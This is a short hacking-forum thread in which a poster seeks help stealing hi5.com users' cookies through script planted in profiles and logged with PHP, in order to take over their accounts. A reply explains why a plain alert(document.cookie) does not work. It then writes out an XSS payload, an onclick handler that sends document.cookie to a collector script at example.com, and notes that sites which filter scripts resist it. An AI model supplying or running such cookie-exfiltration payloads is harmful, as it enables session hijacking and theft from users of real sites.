
Want to Start hi5 get cookies project!


diego018


Hi hackers. The social network site hi5.com allows you to place codes like YouTube scripts, etc. in your profile. I know that with a special function. <script>alert(document.cookie)</script>

And if we create a special page on a webserver, written in PHP, to store the cookies, we can get access as some user via their cookies.

Here is some info I have found:

http://www.pabrantes.net/blog/comments/start/2006-05-01/1 (don't know if it still works)

I don't know where to start, hope that you can give me some ideas. The only thing that I don't know how to do is how to retrieve the cookies; I know how to save them via a PHP file and a txt file.


<script>alert(document.cookie)</script>

only shows you YOUR cookie. It doesn't log a user's cookies from another site while visiting your site. It only shows the cookie for the page you are on, and only if the page you are on has set a cookie. For example, go to any site that uses cookies and type the following in your address bar:

java script:alert(unescape(document.cookie));

(remove the space in "javascript")

It will show you YOUR cookie.

To steal a cookie, the site must have a flaw that allows an XSS attack of some sort, like:

<a href="#" onclick="window.location='http://example.com/somescript.php?cookie='+escape(document.cookie); return false;">Click here!</a>

And this only works if you can insert this on a foreign site other than your own, and chances are, won't work if the site knows what they are doing. They should remove any scripting in a post or comment field. The method you describe

<script>alert(document.cookie)</script>

is not going to work just by having them visit your page.

Look at the link you posted, as they describe in more detail what is going on. Also, that post is from like 2006, so if they are still vulnerable to that sort of attack, I can't imagine they would still be afloat with such XSS attacks made so easy on their system.

